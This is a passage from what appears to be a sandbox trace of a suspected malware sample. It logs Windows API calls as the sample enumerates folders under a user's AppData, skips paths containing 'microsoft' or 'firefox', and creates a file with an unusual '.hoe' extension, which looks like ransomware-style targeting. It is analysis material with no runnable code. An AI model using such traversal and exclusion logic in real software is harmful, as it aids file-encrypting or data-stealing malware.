returned 1 [0056.794] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.794] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0056.794] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.794] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.795] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.795] PathMatchSpecW (pszFile="OneDrive.lnk", pszSpec="*") returned 1 [0056.795] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.795] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0056.795] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0056.795] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.795] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.795] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.795] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.795] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.795] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.795] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.796] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="System Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools" [0056.796] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*" [0056.796] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="Command Prompt.lnk", pszSpec="*") returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="computer.lnk", pszSpec="*") returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="Control Panel.lnk", pszSpec="*") returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="Default Apps.lnk", pszSpec="*") returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0056.796] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.796] PathMatchSpecW (pszFile="Devices.lnk", pszSpec="*") returned 1 [0056.797] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.797] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0056.797] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.797] PathMatchSpecW (pszFile="Run.lnk", pszSpec="*") returned 1 [0056.797] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.797] PathMatchSpecW (pszFile="Windows Defender.lnk", pszSpec="*") returned 1 [0056.797] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.797] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.797] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.797] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Windows PowerShell" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell" [0056.797] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*" [0056.797] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.797] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] PathMatchSpecW (pszFile="Windows PowerShell (x86).lnk", pszSpec="*") returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] PathMatchSpecW (pszFile="Windows PowerShell ISE (x86).lnk", pszSpec="*") returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] PathMatchSpecW (pszFile="Windows PowerShell ISE.lnk", pszSpec="*") returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.798] PathMatchSpecW (pszFile="Windows PowerShell.lnk", pszSpec="*") returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.798] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.798] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0056.798] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.799] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.799] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.799] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0056.799] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0056.799] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07458 [0056.800] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.800] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.800] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0056.800] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.800] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0056.800] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0056.800] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07458 [0056.801] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.801] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.801] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="CachedFiles" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles" [0056.801] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*" [0056.801] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0056.801] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.801] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.801] PathMatchSpecW (pszFile="CachedImage_1440_900_POS4.jpg", pszSpec="*") returned 1 [0056.801] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.801] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.802] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.802] PathMatchSpecW (pszFile="TranscodedWallpaper", pszSpec="*") returned 1 [0056.802] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.802] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0056.802] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.802] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.802] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0056.802] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0056.803] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0056.803] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0056.803] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0056.803] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07158 [0056.803] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.804] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.804] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0056.804] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0056.804] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb070d8 [0056.804] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.804] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.804] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0056.804] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0056.804] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb072d8 [0056.804] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.805] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.805] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0056.805] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.805] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0056.809] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0056.809] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.809] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0 [0056.809] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0056.810] PathFindExtensionW (pszPath="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033") returned="" [0056.810] PathCombineW (in: pszDest=0x9af090, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" [0056.810] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x15e89c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0056.812] CloseHandle (hObject=0x210) returned 1 [0056.813] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0 [0056.813] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0056.813] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0056.813] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0056.813] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0xb070d8 [0056.813] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.813] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.814] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0056.814] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0 [0056.814] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0056.814] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0056.814] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0056.814] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0056.814] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0056.814] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0056.815] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0056.815] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0056.815] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0056.815] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0056.815] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0056.815] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb07558 [0056.815] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.816] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.816] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.816] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0056.816] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 1 [0056.816] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="microsoft") returned 0x0 [0056.816] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="firefox") returned 0x0 [0056.816] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0056.816] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb071d8 [0056.817] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0056.817] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0056.817] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.817] Sleep (dwMilliseconds=0x0) [0056.882] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0056.882] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0056.882] Sleep (dwMilliseconds=0x0) [0056.916] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0056.916] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.921] Sleep (dwMilliseconds=0x0) [0056.993] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.993] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0056.994] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") 